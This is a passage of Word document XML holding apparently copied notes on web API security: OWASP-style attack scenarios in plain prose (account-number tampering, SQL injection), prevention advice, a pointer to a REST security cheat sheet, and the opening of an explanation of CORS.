          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Modern applications often involve rich client applications and APIs, such as JavaScript in the browser and mobile </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C470B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>apps, that</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C470B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> connect to an API of some kind (SOAP/XML, REST/JSON, RPC, GWT, etc.). These APIs are often unprotected and contain numerous vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0014472F" w:rsidRPr="0014472F" w:rsidRDefault="0014472F" w:rsidP="0014472F">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014472F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Example Attack Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0014472F" w:rsidRPr="0014472F" w:rsidRDefault="0014472F" w:rsidP="0014472F">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014472F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Scenario #1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0014472F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Imagine a mobile banking app that connects to an XML API at the bank for account information and performing transactions. The attacker reverse engineers the app and discovers that the user account number is passed as part of the authentication request to the server along with the username and password. The attacker sends legitimate credentials, but another user’s account number, gaining full access to the other user’s account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0014472F" w:rsidRPr="0014472F" w:rsidRDefault="0014472F" w:rsidP="0014472F">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014472F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #2</w:t>
      </w:r>
      <w:r w:rsidRPr="0014472F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Imagine a public API offered by an Internet startup for automatically sending text messages. The API accepts JSON messages that contain a “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0014472F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>transactionid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0014472F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>” field. The API parses out this “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0014472F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>transactionid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0014472F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>” value as a string and concatenates it into a SQL query, without escaping or parameterizing it. As you can see the API is just as susceptible to SQL injection as any other type of application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0014472F" w:rsidRPr="0014472F" w:rsidRDefault="0014472F" w:rsidP="0014472F">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014472F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In either of these cases, the vendor may not provide a web UI to use these services, making security testing more difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019456D" w:rsidRPr="0019456D" w:rsidRDefault="0019456D" w:rsidP="0019456D">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019456D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How Do I Prevent '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0019456D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Underprotected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0019456D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> APIs'?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019456D" w:rsidRPr="0019456D" w:rsidRDefault="0019456D" w:rsidP="0019456D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019456D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The key to protecting APIs is to ensure that you fully understand the threat model and what defenses you have:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019456D" w:rsidRPr="0019456D" w:rsidRDefault="0019456D" w:rsidP="0019456D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019456D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure that you have secured communications between the client and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0019456D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>your</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0019456D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019456D" w:rsidRPr="0019456D" w:rsidRDefault="0019456D" w:rsidP="0019456D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019456D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ensure that you have a strong authentication scheme for your APIs, and that all credentials, keys, and tokens have been secured.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019456D" w:rsidRPr="0019456D" w:rsidRDefault="0019456D" w:rsidP="0019456D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019456D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ensure that whatever data format your requests use, that the parser configuration is hardened against attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019456D" w:rsidRPr="0019456D" w:rsidRDefault="0019456D" w:rsidP="0019456D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019456D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Implement an access control scheme that protects APIs from being improperly invoked, including unauthorized function and data references.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019456D" w:rsidRPr="0019456D" w:rsidRDefault="0019456D" w:rsidP="0019456D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019456D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Protect against injection of all forms, as these attacks are just as viable through APIs as they are for normal apps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019456D" w:rsidRPr="0019456D" w:rsidRDefault="0019456D" w:rsidP="0019456D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019456D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Be sure your security analysis and testing covers all your APIs and your tools can discover and analyze them all effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F28A6" w:rsidRDefault="00711445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>There seems to be a convergence towards using </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>JSON Web Tokens</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> (JWT) as the format for security tokens. JWTs are JSON data structures containing a set of claims that can be used for access control decisions. A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542F8C" w:rsidRDefault="004D49A4">
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="00E51201" w:rsidRPr="00EC35AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/REST_Security_Cheat_Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E51201" w:rsidRDefault="00E51201"/>
    <w:p w:rsidR="00E51201" w:rsidRDefault="00E51201"/>
    <w:p w:rsidR="00E51201" w:rsidRDefault="00D7718F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00130B3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cross-origin resource sharing</w:t>
      </w:r>
      <w:r w:rsidRPr="00130B3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00130B3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="00130B3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>is a mechanism that allows restricted resources (e.g. fonts) on a </w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:tooltip="Web page" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>web page</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> to be requested from another </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:tooltip="Domain name" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>domain</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> outside the domain from which the first resource was served.</w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:anchor="cite_note-mozhacks_cors-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A web page may freely embed cross-origin images, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:instrText xml:space="preserve"> HYPERLINK "https://en.wikipedia.org/wiki/Style_sheet_(web_development)" \o "Style sheet (web development)" </w:instrText>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>stylesheets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A18C2">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, scripts, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:instrText xml:space="preserve"> HYPERLINK "https://en.wikipedia.org/wiki/HTML_element" \o "HTML element" </w:instrText>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>iframes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A18C2">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, and videos.</w:t>
      </w:r>
      <w:hyperlink r:id="rId45"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Certain "cross-domain" requests, notably </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:instrText xml:space="preserve"> HYPERLINK "https://en.wikipedia.org/wiki/Ajax_(programming)" \o "Ajax (programming)" </w:instrText>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, however, are forbidden by default by the </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:tooltip="Same-origin policy" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>same-origin security policy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7718F" w:rsidRDefault="00D7718F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pP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 xml:space="preserve">Cross Origin Resource Sharing (CORS) allows us to use Web applications within browsers when domains aren’t the same. For example, a site with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>domain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>test.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
